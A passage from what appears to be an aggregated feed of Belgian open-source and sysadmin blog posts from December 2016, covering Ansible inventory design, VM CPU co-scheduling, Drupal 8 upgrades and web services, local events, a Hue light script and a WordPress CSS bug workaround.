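from collections import defaultdict

vhosts = [
    {"name": "site-a", "apache_host": "web1"},
    {"name": "site-b", "apache_host": "web1"},
    {"name": "site-c", "apache_host": "web2"},
]

def group_by(items, key):
    grouped = defaultdict(list)
    for item in items:
        grouped[item[key]].append(item)
    return dict(grouped)

per_apache = group_by(vhosts, "apache_host")   # one list of vhosts per apache host
all_vhosts = [v["name"] for v in vhosts]       # one flat list for the load balancer
print(per_apache)
print(all_vhosts)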

Variables get inherited throughout the inventory trees. This could happen in a way where some precedence makes one value overwrite another, or in a way where multiple values become a list of values. This might be part of some schema for variable sets in a specific tree. Another idea might be to not care about group types at all, and just apply rules to groups via the variable sets they carry: track which sets a group inherits from, perhaps namespace them, and define how variable sets should merge, listify, or are not allowed to be combined.

How do we plug external data into this model? Should the equivalent of current dynamic inventory scripts be mapped onto a subtree? Or span multiple locations? Be mapped onto a specific variable set? Hard to state as a general rule. Lots of those inventory scripts focus on hosts and groups, and perhaps some facts, whilst this model has a bigger focus on managing variables.

Putting some more logic in the inventory could also mean that part of the manipulation that lookup plugins perform could happen in the inventory. This would greatly simplify how we write loops in roles, by being able to do everything with a simple standard with_items.

As Dag Wieërs summarised his view on inventory to me, a new inventory should allow us to:

  1. combine data from different sources, into a single source of truth
  2. do dynamic facts manipulation
  3. have a deterministic but configurable hierarchy

Another thing users tend to handle in different ways is where host creation happens. Some start by defining hosts in the Ansible inventory and then create them with e.g. a vmware role; others import the host list from an external inventory, e.g. ec2. The way we import inventory data from external sources should be well defined: how we map external groups, hosts and variables into this inventory model. Of course a new inventory should have a more elaborate API, not only internally, but also exposed as the JSON API for dynamic inventory scripts.

Now, all of this probably sounds overly complex, and overdoing this new design is a serious risk. But I do hope to come to a model with just some basic, simple rules that allows us to implement all these ideas. If you have ideas on this, feel free to comment here or get in touch with me to discuss this further!

 

The post Some first design ideas for an Ansible Inventory 2.0 appeared first on Serge van Ginderachter.

December 19, 2016

Our application is slow, let's throw more CPUs at it!

If you work in IT, either as a developer or a sysadmin, you might've heard that phrase before. Something is slow, so you throw hardware at it. Well, in a virtual environment (and what isn't a VM nowadays?), that isn't always the right fix.

It's not just overcommitting

The obvious reason is that those CPUs need to come from somewhere, and that hardware might be overloaded. If you only have 16 cores in your physical machine, it doesn't make much sense to have 4 VMs running with 8 cores each, all consuming 100% CPU.

Simple math tells you that 4x VMs x 8 CPUs = a demand for 32 CPUs, where your hardware can only supply 16 CPUs (1).

On the other hand, if each of those VMs only consumed 50% of its assigned CPUs, everything's fine -- right?

Well, not so much.

(1) Yes, hyperthreading, I know.

Synchronising CPU clock cycles

In the VMware world there's a fancy term called %CSTP or Co-Stop. The same logic applies to Xen, KVM and any other virtualisation technology.

It boils down to this.

The %CSTP value represents the amount of time a virtual machine with multiple virtual CPUs is waiting to be scheduled on multiple cores on the physical host. The higher the value, the longer it waits and the worse its performance.
Determining if multiple virtual CPUs are causing performance issues

Or phrased differently: the Co-Stop percentage is the time a virtual machine was ready to run but had to wait for the hypervisor to schedule the CPUs it demanded on the physical hardware.

It's a CPU scheduling issue.

Imagine you have a VM with 8 CPUs assigned to it. If a new process wants to run in that VM, it requests CPU time from the kernel. That request is then interpreted by the hypervisor below, which translates those virtual CPUs to physical sockets & cores.

But it has to keep the other VMs in mind too, since those might also be requesting CPU time.

And here's the catch: when a VM is ready to be scheduled, the hypervisor needs to schedule all of its allocated CPUs at (nearly) the same time. When your VM has 8 CPUs but only really needs 2, your hypervisor will still try to schedule all 8 CPUs at the same time. That might take longer due to congestion on the hypervisor, since other VMs can be asking for time from those very same CPUs.

But why wait for 8 CPUs to be scheduled when in reality your VM only needs 2? The time spent waiting for the hypervisor to have 8 CPUs free to assign is time wasted.
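
To make that intuition concrete, here is a toy Monte Carlo sketch; the core count, busy probability and "ticks" are invented, and a real hypervisor scheduler is far more sophisticated, but it shows how the wait grows with the number of vCPUs that must be co-scheduled:

import random

PHYSICAL_CORES = 16
BUSY_PROBABILITY = 0.5   # assume each physical core is busy half the time

def average_wait(vcpus, trials=5000):
    # Average number of "ticks" until `vcpus` physical cores are free at the same time.
    total = 0
    for _ in range(trials):
        ticks = 0
        while sum(random.random() > BUSY_PROBABILITY
                  for _ in range(PHYSICAL_CORES)) < vcpus:
            ticks += 1
        total += ticks
    return total / trials

for n in (2, 4, 8, 12):
    print(f"{n:2d} vCPUs -> average wait: {average_wait(n):.2f} ticks")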

This is especially apparent in cloud environments, where it's easy to either over-commit (as the hoster) or over-reserve (as the cloud tenant).

In general, it's a very good rule of thumb to only assign the resources you need in a virtual environment, no more, no less. Assigning more might hurt performance due to CPU scheduling congestion; assigning too few resources will cause your VM to run at 100% capacity all the time.

Don't overcommit. Don't underprovision. Assess your application and provision the right resources.

The post In virtual environments, less (CPU’s) is more appeared first on ma.ttias.be.

December 18, 2016

That's allowed, right? I'm not even being paid by Lannoo. Though I do think they could do that one of these days.

So. What's going on?

Her book, Onlife, hoe de digitale wereld je leven bepaalt, was yesterday elected Liberales Book of the Year 2016. The jury consisted of philosopher Tinneke Beeckman, Liberales core member Dirk Verhofstadt, Liberales chairman Claude Nijs, deMens.nu chairman Sylvain Peeters and Liberales core member Koert Van Espen.

She warmly invites all of us to the award evening on Thursday 26 January 2017 at 8 pm, at the Liberaal Archief (Kramersplein 23) in Ghent. The programme looks like this:

First, the Liberales book Theorieën over rechtvaardigheid. De John Rawlslezingen (edited by Dirk Verhofstadt) will be presented.

Next comes the presentation of the book De keuze van D66 (edited by Daniël Boomsma), with a speech by Flemish MP Mathias De Clercq.

Then Koert Van Espen interviews her about Onlife.

And after all that food for thought, the ambrosia will flow freely during the New Year's reception.

Admission is free, but registration is required via info@liberales.be.

Yes, I do think the Linux community should be present. Last time I was there alone. When will the rest of planet.grep.be come and support me? We can make it a fun evening. Right?!

Kind regards,

The philip. Not the one who is always going on about philip conspiracies. The other one, who goes along with it.

December 16, 2016

Some of my readers may have noticed that I recently upgraded this blog from Drupal 7 to Drupal 8. You might be wondering why it took me so long, and the truth is that while I love working on my site, it's hard to justify spending much time on it.

I did most of the work on my commute to work, cramped in a small seat on the train to the tune of the rumbling train carriage. I finally pushed the site live during Thanksgiving weekend. Nothing like seeing the Drupal migration tool run on your computer to the smell of the turkey cooking in the oven. The comfortable atmosphere of Thanksgiving -- and the glass of wine that was sitting on my desk -- made it all the more fun.

While my blog has been around for more than a decade, it isn't very complex; I have approximately 1,250 blog posts and 8,000 photos. All of the photos on my website are managed by my Album module, a custom Drupal module whose first version I wrote about ten years ago. Since its inception, I've upgraded the module to each major Drupal version from Drupal 5 to 7, and now to Drupal 8.

Upgrading my little website was relatively simple, involving porting my custom Album module, porting my theme to use Twig, and migrating the data and configuration. Though I've reviewed and committed many patches that went into Drupal 8, this was the first time I actually built a Drupal 8 module, theme, and migration from scratch.

Each of the steps in upgrading a Drupal site has undergone substantial changes in the transition from Drupal 7 to Drupal 8. Building a module, for instance, is completely different because of the introduction of object-oriented programming paradigms, the new routing system, and more. Writing a module in Drupal 8 is so much nicer than writing a module in Drupal 7; my code is better organized, more reusable, and better tested. Theming has been completely reinvented around Twig. I found Twig much more pleasant to use than PHPTemplate in Drupal 7, and I'm very happy with how the theming process has improved. That said, I have to give a special shoutout to Preston So for helping me with my theme; I was painfully reminded that I'm still not a designer or a CSS expert.

Overall, porting my site was a fun experience and I'm excited to be using Drupal 8. There is so much power packed into Drupal 8. Now that I've experienced Drupal 8 development from the other side of the equation, I believe even more in the decisions we made. While there is always room for improvement, Drupal 8 is a giant leap forward for Drupal.

This Thursday 19 January 2017 at 7 pm, the 55th Mons session of the Jeudis du Libre de Belgique will take place.

The topic of this session: Docker, c'est quoi st'affaire? (Docker, what's that all about?)

Theme: sysadmin

Audience: sysadmins|developers|companies|students

Speaker: Jean-Marc Meessen (Worldline)

Venue: Université de Mons, Campus Plaine de Nimy, avenue Maistriau, Grands Amphithéâtres, Auditoire Curie (see this map on the UMONS website, or the OSM map).

Participation is free and only requires registering by name, preferably in advance, or at the entrance to the session. Please indicate your intention by registering via http://jeudisdulibre.fikket.com/. The session will be followed by a friendly drink.

The Jeudis du Libre in Mons are also supported by our partners: CETIC, Normation, MeaWeb and Phonoid.

If you are interested in this monthly series, do not hesitate to consult the agenda and to subscribe to the mailing list in order to receive all the announcements.

As a reminder, the Jeudis du Libre are meant as spaces for exchange around Free Software topics. The Mons meetings take place every third Thursday of the month and are organised on the premises of, and in collaboration with, the Mons universities and colleges involved in training computer scientists (UMONS, HEH and Condorcet), with the support of the non-profit LoLiGrUB, which is active in promoting free software.

Description: this talk will give a practical overview of this buzzing technology. In its three years of existence, this containerisation technology has attracted more and more interest, even enthusiasm. It opens the door to an innovative way of testing, packaging and distributing applications. It could be a key element in establishing a DevOps culture in the enterprise.

Starting from the basic principles, we will describe how to build and use simple containers. We will also explore the tooling for setting up more complex infrastructures, with tools such as "docker-compose" or "swarm". Nothing is more fun than demonstrating and experimenting with these tools on a Raspberry Pi cluster. We will conclude the talk with an overview of the use of Docker in production in general, and of the security aspects in particular.

Short bio: Jean-Marc MEESSEN is a perpetual and enthusiastic learner, admirative of all the cool stuff out there. He loves to share his discoveries and passions, and is a great believer in cross-silo active communities. Besides doing Java development, he is a development infrastructure expert and coaches teams on various aspects of development technology and practices, helping to build a DevOps culture in his company, Worldline.

December 15, 2016

Those who pass judgement on everything there is little time for take their time to check whether the proposers really took their time.

December 14, 2016

I published the following diary on isc.sans.org: “UAC Bypass in JScript Dropper“.

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. It’s always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques… [Read more]

[The post [SANS ISC Diary] UAC Bypass in JScript Dropper has been first published on /dev/random]

December 11, 2016

The Linux Professional Institute, the BSD Certification Group and The Document Foundation will offer exam sessions at FOSDEM 2017. Interested candidates can now register for exams with the respective organisations. Further details are available on the certification page.

December 10, 2016

This summer I had the opportunity to present my practical fault detection concepts and hands-on approach as conference presentations.

First at Velocity and then at SRECon16 Europe. The latter page also contains the recorded video.

If you’re interested at all in tackling non-trivial timeseries alerting use cases (e.g. working with seasonal or trending data) this video should be useful to you.

It’s basically me trying to convey in a concrete way why I think the big-data and math-centered algorithmic approaches come with a variety of problems making them unrealistic and unfit, whereas the real breakthroughs happen when tools recognize the symbiotic relationship between operators and software, and focus on supporting a collaborative, iterative process to managing alerting over time. There should be a harmonious relationship between operator and monitoring tool, leveraging the strengths of both sides, with minimal factors harming the interaction. From what I can tell, bosun is pioneering this concept of a modern alerting IDE and is far ahead of other alerting tools in terms of providing high alignment between alerting configuration, the infrastructure being monitored, and individual team members, which are all moving targets, often even fast moving. In my experience this results in high signal/noise alerts and a happy team. (according to Kyle, the bosun project leader, my take is a useful one)

That said, figuring out the tool and using it properly has been, and remains, rather hard. I know many who would rather not fight the learning curve. Recently the bosun team has been making strides at making it easier for newcomers - e.g. reloadable configuration and Grafana integration - but there is lots more to do. Part of the reason is that some of the UI tabs aren't implemented for non-opentsdb databases, and integrating Graphite, for example, into the tag-focused system that is bosun is bound to be a bit weird (that's on me).

For an interesting juxtaposition, we released Grafana v4 with alerting functionality which approaches the problem from the complete other side: simplicity and a unified dashboard/alerting workflow first, more advanced alerting methods later. I’m doing what I can to make the ideas of both projects converge, or at least make the projects take inspiration from each other and combine the good parts. (just as I hope to bring the ideas behind graph-explorer into Grafana, eventually…)

Note: One thing that somebody correctly pointed out to me, is that I’ve been inaccurate with my terminology. Basically, machine learning and anomaly detection can be as simple or complex as you want to make it. In particular, what we’re doing with our alerting software (e.g. bosun) can rightfully also be considered machine learning, since we construct models that learn from data and make predictions. It may not be what we think of at first, and indeed, even a simple linear regression is a machine learning model. So most of my critique was more about the big data approach to machine learning, rather than machine learning itself. As it turns out then the key to applying machine learning successfully is tooling that assists the human operator in every possible way, which is what IDE’s like bosun do and how I should have phrased it, rather than presenting it as an alternative to machine learning.

December 09, 2016

But judges must apply the law, not try to make laws themselves. The separation of powers works in every direction.

Imperator Bart has a point.

Among the most important initiatives for Drupal 8's future is the "API-first initiative", whose goal is to improve Drupal's web services capabilities for building decoupled applications. In my previous blog posts, I evaluated the current state of, outlined a vision for, and mapped a path forward for Drupal's web services solutions.

In the five months since my last update, web services in Drupal have moved forward substantially in functionality and ease of use. This blog post discusses the biggest improvements.

An overview of the key building blocks to create web services in Drupal. Out of the box, Drupal core can expose raw JSON structures reflecting its internal storage, or it can expose them in HAL. Note: Waterwheel has an optional dependency on JSON API if JSON API methods are invoked through Waterwheel.js.

Core REST improvements

With the release of Drupal 8.2, the core REST API now supports important requirements for decoupled applications. First, you can now retrieve configuration entities (such as blocks and menus) as REST resources. You can also conduct user registration through the REST API. The developer experience of core REST has improved as well, with simplified REST configuration and better response messages and status codes for requests causing errors.

Moreover, you can now access Drupal content from decoupled applications and sites hosted on other domains thanks to opt-in cross-origin resource sharing (CORS) support. This is particularly useful if you have a JavaScript application hosted directly on AWS, for instance, while your Drupal repository is hosted on a separate platform. Thanks to all this progress, you can now build more feature-rich decoupled applications with Drupal.
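
For reference, the opt-in CORS support is configured in sites/default/services.yml. The sketch below shows roughly what that configuration looks like; the key names are as I recall them from the 8.2 default.services.yml, so verify them against your own version:

parameters:
  cors.config:
    enabled: true
    allowedHeaders: ['x-csrf-token', 'content-type', 'accept']
    allowedMethods: ['GET', 'POST', 'PATCH', 'DELETE', 'OPTIONS']
    allowedOrigins: ['https://app.example.com']
    exposedHeaders: false
    maxAge: false
    supportsCredentials: false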

All of these improvements are thanks to the hard work of Wim Leers (Acquia), Ted Bowman (Acquia), Daniel Wehner (Chapter Three), Clemens Tolboom, José Manuel Rodríguez Vélez, Klaus Purer, James Gilliland (APQC), and Gabe Sullice (Aten Design Group).

JSON API as an emerging standard

JSON API is a specification for REST APIs in JSON which offers several compelling advantages over the current core REST API. First, JSON API provides a standard way to query not only single entities but also all relationships tied to that entity and to perform query operations through query string parameters (for example, listing all tags associated with an article). Second, JSON API allows you to fetch lists of content entities (including filtering, sorting and paging), whereas the only options for this currently available in core are to issue multiple requests, which is undesirable for performance, or to query Drupal views, which require additional work to create.
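
As an illustration only (not taken from the module's documentation), a collection request against Drupal's JSON API module could look like the sketch below; the /jsonapi path prefix, the field names and the exact filter syntax depend on your site and module version:

import requests

response = requests.get(
    "https://example.com/jsonapi/node/article",
    params={
        "filter[status]": 1,        # only published articles
        "sort": "-created",         # newest first
        "page[limit]": 10,          # first ten results
        "include": "field_tags",    # pull in the related tag entities as well
    },
    headers={"Accept": "application/vnd.api+json"},
)
for item in response.json()["data"]:
    print(item["id"], item["attributes"]["title"])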

Moreover, JSON API is increasingly common in the JavaScript community due to its adoption by developers creating REST APIs in JSON and by members of both the Ruby on Rails and Ember communities. In short, the momentum outside of Drupal currently favors JSON API over HAL. It's my belief that JSON API should become an experimental core module, and it may one day potentially even supersede HAL, Views-based REST endpoints, and more. Though Views REST exports will always be valuable for special needs, JSON API is suitable for more common tasks due to query operations needing no additional configuration. All this being said, we should discuss and evaluate the implications of prioritizing JSON API.

Thanks to the efforts of Mateu Aguiló Bosch (Lullabot) and Gabe Sullice (Aten Design Group), the JSON API module in Drupal 8 is quickly approaching a level of stability that could put it under consideration as a core experimental module.

OAuth2 bearer token authentication

One of the issues facing many decoupled applications today is the lack of a robust authentication mechanism when working with Drupal's REST API. Currently, core REST only has two options available out of the box, namely cookie-based authentication, which is unhelpful for decoupled applications on domains other than the Drupal site, and basic authentication, which is less secure than other mechanisms.

Due to its wide acceptance, OAuth2 seems a logical next step for Drupal sites that need to authenticate requests. Because it is more secure than what is available in core REST's basic authentication, OAuth2 would help developers build more secure decoupled Drupal architectures and allow us to deprecate the other less secure approaches.

It would make sense to see an OAuth2 solution such as Simple OAuth, the work of Mateu Aguiló Bosch (Lullabot), as an experimental core module, so that we can make REST APIs in Drupal more secure.

Waterwheel, Drupal's SDK ecosystem

The API-first initiative's work goes beyond making improvements on the Drupal back end. Acquia released Waterwheel.js 1.0 as open-source, the first iteration of a helper SDK for JavaScript developers. The Waterwheel.js SDK helps JavaScript developers perform requests against Drupal without requiring extensive knowledge of how Drupal's REST API functions. For example, the Waterwheel module allows you to benefit from resource discovery, which makes your JavaScript application aware of Drupal's data model. Waterwheel.js also integrates easily with the JSON API contributed module.

Thanks to Kyle Browning (Acquia), the Waterwheel.swift SDK allows developers of applications for Apple devices such as iPads, iPhones, Apple Watches, and Apple TVs to more quickly build their Drupal-powered applications. To learn more about the Waterwheel ecosystem, check the blog posts by Preston So (Acquia).

Conclusion

Thanks to the hard work of the many contributors involved, the API-first initiative is progressing with great momentum. In this post, we ended with the following conclusions:

  • The JSON API and Simple OAuth modules could be candidates for inclusion in Drupal 8 core — this is something we should discuss and evaluate.
  • We should discuss where support for HAL and JSON API stops and starts, because it helps us focus our time and effort.

If you are building decoupled applications with Drupal 8, we would benefit significantly from your impressions of the core REST API and JSON API implementations now available. What features are missing? What queries are difficult or need work? How can we make the APIs more suited to your requirements? Use the comments section on this blog post to tell us more about the work you are doing so we can learn from your experiences.

Of course, if you can help accelerate the work of the API-first initiative by contributing code, reviewing and testing patches, or merely by participating in the discussions within the issues, you will not only be helping improve Drupal itself; you'll be helping improve the experience of all developers who wish to use Drupal as their ideal API-first back end.

Special thanks to Preston So for contributions to this blog post and to Wim Leers, Angie Byron, Ted Bowman and Chris Hamper for their feedback during the writing process.

Among cyclists, there is a saying that the ideal number of bikes to have in your garage is N+1, where N is the number of bikes you currently own.

Yes, there is always a good reason to buy a new bike: to have a road bike, a mountain bike, a gravel bike. But if N+1 is the ideal number, the minimum number is 2. Especially if you use your bike daily.

Because there is only one thing worse for a cyclist than having to pedal at night in the cold and the rain: being forced to use a car!

I personally discovered this problem when, after a broken derailleur, I learned that I would be stuck for ten days without riding, the part not being in stock.

The next day, I had found a second-hand bike.

A bit dated but clearly barely used, this second mount plays its reserve role admirably. I hop on it when my proud steed is in for maintenance, when it reveals a slow puncture in the morning and I don't have the courage to change the inner tube before going to work, or when I simply feel like a change of air.

After two years at this rhythm, I had a strange intuition.

In two years, my main bike, which I maintain and pamper, had gone through several services. It had suffered multiple punctures and gone through several sets of tyres. Chains followed one another, bearings had to be replaced and cables kept seizing up.

None of that seemed to affect my reserve bike. I had changed an inner tube once, but the chain and the tyres were still the original ones, despite much more cursory, if not non-existent, maintenance.

This observation led me to a ruthless explanation: although older, my reserve bike was of clearly better quality. New bikes with new tyres are fragile and made to encourage consumption.

Intuitive, isn't it?

And yet completely wrong. Because the use of a bike is not measured in time spent in the garage but in kilometres ridden.

As I have told you before, I love Strava. Each of my rides is recorded in the app along with the bike used for the occasion. I even note when I change a part, in order to know the exact mileage of each component.

I thus know that, on my main bike, a good chain lasts 2,500 km while a bad one is worn out after 1,500 km. The rear tyres last between 800 and 1,600 km; easily triple that at the front. On top of that, my use of the bike requires a trip to the workshop on average every 2,000 km. And the bike is approaching 8,000 km.

My reserve bike, on the other hand, has only just passed 500 km!

So it is perfectly normal that I have had no trouble, no maintenance, no work on this bike: it simply has not yet ridden a third of the distance at which the wear of certain components starts to show.

My intuition was completely misleading.

This anecdote lends itself to a general moral: we often let ourselves be carried away by intuitions, by similarities. With the two bikes permanently side by side in the garage, it is natural to compare them. Taking the reserve bike out from time to time gave me the impression that the two bikes lived almost similar lives. Admittedly, I thought I used it three or four times less. But the figures reveal it is fifteen times less!

When you have convictions or intuitions, confront them with the facts, with the real figures.

Many of our problems come from the fact that we blindly follow our intuitions, even when the figures demonstrate the absurdity of our beliefs. Even today, politicians advocate austerity to restart the economy, and they advocate expelling foreigners to free up jobs, where all known examples have demonstrated the absurd inanity and counter-productiveness of this kind of measure.

Worse: today, there are still people who vote for these politicians.

To those people, tell the story of my second bike.

 

Photo by AdamNCSU.

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum, blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or contact me.

This text is published under the CC-By BE licence.

Two of the lights in our living room are Philips Hue lights.
I especially like them for their ability to reach 2000K color temperature (very warm white light), which gives a nice mellow yellowish white light.

We control the lights via normal light switches contained in the light fixture.
Due to the way Philips Hue lights work, this implies that whenever we turn the lights on again they go back to the default setting of around 2700K (normal warm white).

In order to fix this once and for all I wrote a little program in rust that does this:

  • poll the state of the lights every 10 seconds (there is no subscribe/notify :( )
  • keep the light state in memory
  • if a light changes from unreachable (usually due to being turned off by the switch) to reachable (turned on by the switch), restore the hue to the last state before it became unreachable
Code is in rust (of course) and can be found at https://github.com/andete/hue_persistence.

Just run it on a local server (I use my shuttle xs36v) and it automatically starts working.
Keep in mind that it can take up to a minute for the Hue system to detect that a light is reachable again.
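
For the curious, here is a rough Python sketch of the same polling idea, assuming the standard Hue bridge REST endpoints (GET /api/<username>/lights and PUT /api/<username>/lights/<id>/state); the bridge address and API username are placeholders, and the real implementation is the Rust program linked above:

import time
import requests

BRIDGE = "192.168.1.2"          # placeholder bridge address
USERNAME = "my-api-username"    # placeholder whitelisted API user
BASE = f"http://{BRIDGE}/api/{USERNAME}"
last_seen = {}                  # light id -> last state observed while reachable

while True:
    lights = requests.get(f"{BASE}/lights").json()
    for light_id, light in lights.items():
        state = light["state"]
        previous = last_seen.get(light_id)
        if state.get("reachable"):
            if previous is not None and not previous.get("reachable"):
                # The light just came back (turned on at the wall switch):
                # push the last known colour settings back to it (approximate,
                # this ignores the light's colormode).
                restore = {k: previous[k] for k in ("bri", "hue", "sat", "ct") if k in previous}
                requests.put(f"{BASE}/lights/{light_id}/state", json=restore)
                state = {**state, **restore}
            last_seen[light_id] = state
        elif previous is not None:
            previous["reachable"] = False   # remember it is gone, keep its settings
    time.sleep(10)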

A short video demoing the system in action:


December 07, 2016

As a freelancer I have seen many companies and many situations, and worked with many Project Managers, Product Owners, Scrum Masters and god knows what other names the HR department came up with.

What is most important, in my experience, is that the people leading the team try to focus the group on as few common goals as possible during one sprint. The more stories or goals the team has to finish, the more individualism creeps in and the fewer things get done (with done being defined by your definition of done).

Put differently, you should try to make your team work the way a soccer team plays. You try to score three, four or five goals per sprint. But you do this as a team.

Example: when a story isn't finished at the end of the sprint, it's the team's fault, not the fault of the one guy who worked on it. The team has to find a solution. If it's always the same guy being lazy, that's not the project's or the team's problem. You or HR deal with that guy later. Doing so is outside of Scrum's scope; it's not for your retrospective discussion. But do sanction the team for not delivering.

Another example is not to put too many stories on the task board, and to keep stories as small and/or well defined as possible. Too many stories, or too large stories, will result in every individual picking a different story (or subtask of a larger story) to be responsible for. At the end of the sprint none of these will be really finished. And the developers in the team won't care about the other features being developed during the sprint. So they will dislike having to review other people's features. They'll have difficulty finding a reviewer. They won't communicate with each other. They'll become careless and dispassionate.

Your planning caused that. That makes you a bad team player. The coach is part of the team.

If you encountered this bug but are not using Autoptimize, leave a comment below or contact me here. Your info can help us understand whether the regression has an impact outside of Autoptimize as well!


Gotta love Sarah, but there's a small bug in Vaughan (WordPress 4.7) that breaks (part of) the CSS when Autoptimized. If you have a theme that supports custom backgrounds (e.g. TwentySixteen) and you set that custom background in the Customizer, the URL ends up escaped (well, they wp_json_encode() it actually) like this:

body{background-image: url("http:\/\/localhost\/wordpress\/wp-content\/uploads\/layerslider\/Full-width-demo-slider\/left.png");}

Which results in the Autoptimized CSS for the background-image being broken because the URL is not recognized as such. The bug has been confirmed already and the fix should land in WordPress 4.7.1.

If you’re impacted and can’t wait for 4.7.1 to be released, there are 2 workarounds:
1. simple: disable the "Aggregate inline CSS" option
2. geeky: use this code snippet to fix the URL before AO has a chance to misinterpret it:

add_filter('autoptimize_filter_html_before_minify', 'fix_encoded_urls');
function fix_encoded_urls($htmlIn) {
    // Only act when the custom background CSS is present in the page.
    if ( strpos($htmlIn, "body.custom-background") !== false ) {
        // Find background-image URLs with JSON-escaped slashes (http:\/\/...).
        preg_match_all("#background-image:\s?url\(?[\"|']((http(s)?)?:\\\/\\\/.*)[\"|']\)?#", $htmlIn, $badUrls);
        if ( !empty($badUrls[1]) ) {
            foreach ( $badUrls[1] as $badUrl ) {
                // Replace each escaped URL with its unescaped form.
                $htmlIn = str_replace($badUrl, stripslashes($badUrl), $htmlIn);
            }
        }
    }
    return $htmlIn;
}